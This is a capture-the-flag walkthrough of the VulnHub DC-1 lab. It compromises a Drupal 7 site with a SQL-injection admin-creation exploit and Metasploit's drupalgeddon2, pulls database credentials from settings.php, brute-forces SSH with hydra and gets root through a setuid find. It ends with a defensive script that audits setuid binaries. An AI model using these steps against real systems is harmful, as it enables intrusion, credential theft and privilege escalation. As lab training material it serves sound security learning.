Download link: https://www.vulnhub.com/entry/dc-1-1,292/
Host discovery: nmap -sn 192.168.44.0/24
(The DC target VM runs in NAT mode, and my NAT network is the 192.168.44.0/24 segment, so I only need to scan that segment for the newly added live host, which must be the target.)
After finding the target's IP address, run a port scan; ports 22, 80 and 111 are open.
Visiting port 80 shows the site runs Drupal, one of the three major PHP CMSes (Drupal, Joomla, WordPress), but the exact version is not yet known.
The earlier nmap port scan used the -A option, which revealed a robots.txt file on the site; the paths listed in that robots.txt were then visited.
UPGRADE.txt reveals that the Drupal version is 7.x.
Use searchsploit in Kali to search for Drupal 7 vulnerabilities.
Use /usr/share/exploitdb/exploits/php/webapps/34992.py, the SQL injection exploit, to add an administrator user.
View the script's usage:
/usr/share/exploitdb/exploits/php/webapps/34992.py -t <website URL> -u <username to add with administrator rights> -p <password for that user>
From the above, you can see that the Administrator user is created successfully
Log in to the admin back-end, click around in it, and find flag3.
I found a file upload in the back-end, but after grinding at it for a long time I got nowhere with it.
Change of approach: use msf (Metasploit) to check whether a usable exploit is available.
msfconsole: start Metasploit
search drupal: search for Drupal exploits
use exploit/unix/webapp/drupal_drupalgeddon2: select the exploit
Configure the exploit options and run it.
Get the shell, find flag1
cat flag1.txt: read flag1
Hint obtained: every good CMS needs a configuration file, and so do you.
Search for the location of the configuration file
cat settings.php: read the configuration file, which contains flag2 and the database username and password.
Flag2 hint: brute force and dictionary attacks are not the only ways to gain access (and you will need access); what can you do with these credentials?
'database' => 'drupaldb',
'username' => 'dbuser',
'password' => 'R0ck3t',
With the database username and password I tried to log in to MySQL, but the mysql client command could not be run from the msf shell.
Get a shell
Using the shell obtained, I tried to log in to the database again, but there was still no output, so the login could not be completed.
The obtained shell has to be upgraded. The target has a Python environment, so Python can be used to spawn a proper TTY shell:
python -c 'import pty;pty.spawn("/bin/sh")'
Reference, from the previous article: https://blog.csdn.net/qq_32393893/article/details/105487795. Once the shell has been upgraded and command output is displayed, the MySQL login succeeds.
The administrator account 'shy' created earlier with the exploit was found in the users table, and flag3 was obtained.
Browsing through the rest of the database turned up nothing else.
The user flag4 was found in the /etc/passwd file
Since port 22 is open, use hydra to brute-force the SSH password of the flag4 user. The wordlist used here is John the Ripper's, at /usr/share/john/password.list.
Log in successfully, find the flag4.txt file, get flag4
According to the hint, the final flag is under /root. Try SUID privilege escalation by enumerating the SUID executables on the system.
find turns out to be SUID, so try to escalate privileges through find:
touch shy
find shy -exec whoami \;
find shy -exec /bin/sh \;
cd /root
cat thefinalflag.txt
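A defender's counterpart to the SUID enumeration above, added here as an example and not part of the original write-up: it audits setuid-root binaries against an expected baseline so that a setuid find (the escalation path used on DC-1) shows up as an alert. The baseline set EXPECTED_SUID and the SAMPLE entries are constructed assumptions, not values from the target.

```python
"""Audit setuid-root executables and report any outside an expected baseline.
DC-1 is rooted through a setuid-root copy of find; a periodic audit like this
turns that misconfiguration into an alert instead of a privilege escalation.
"""
import os
import stat
from typing import Iterable, Iterator, List, Set, Tuple

# Assumed baseline of setuid binaries on a minimal Debian-style host (not from the write-up).
EXPECTED_SUID: Set[str] = {
    "su", "sudo", "passwd", "chsh", "chfn", "gpasswd", "newgrp", "mount", "umount",
}

Entry = Tuple[str, int, int]  # (path, st_mode, st_uid)

def is_suid_root(mode: int, uid: int) -> bool:
    """True for a regular file with the setuid bit whose owner is uid 0."""
    return stat.S_ISREG(mode) and bool(mode & stat.S_ISUID) and uid == 0

def audit(entries: Iterable[Entry], expected: Set[str] = EXPECTED_SUID) -> List[str]:
    """Return, sorted, every setuid-root path whose basename is not in the baseline."""
    flagged = [p for p, mode, uid in entries
               if is_suid_root(mode, uid) and os.path.basename(p) not in expected]
    return sorted(flagged)

def scan_tree(root: str) -> Iterator[Entry]:
    """Yield (path, mode, uid) for files under root; lstat so symlinks are not followed."""
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:  # unreadable or vanished entry, skip it
                continue
            yield path, st.st_mode, st.st_uid

# Constructed sample modelled on DC-1: a setuid-root find beside ordinary binaries.
SAMPLE: List[Entry] = [
    ("/usr/bin/passwd", 0o104755, 0),      # setuid root, expected
    ("/usr/bin/find", 0o104755, 0),        # setuid root, NOT expected: the DC-1 escalation
    ("/bin/ls", 0o100755, 0),              # root-owned but no setuid bit
    ("/home/flag4/tool", 0o104755, 1001),  # setuid, but not root-owned
]

if __name__ == "__main__":
    for path in audit(SAMPLE):
        print("unexpected setuid-root binary:", path)
```

To audit a live host, pass audit(scan_tree("/")) instead of SAMPLE and add any site-specific binaries to EXPECTED_SUID before treating the output as findings.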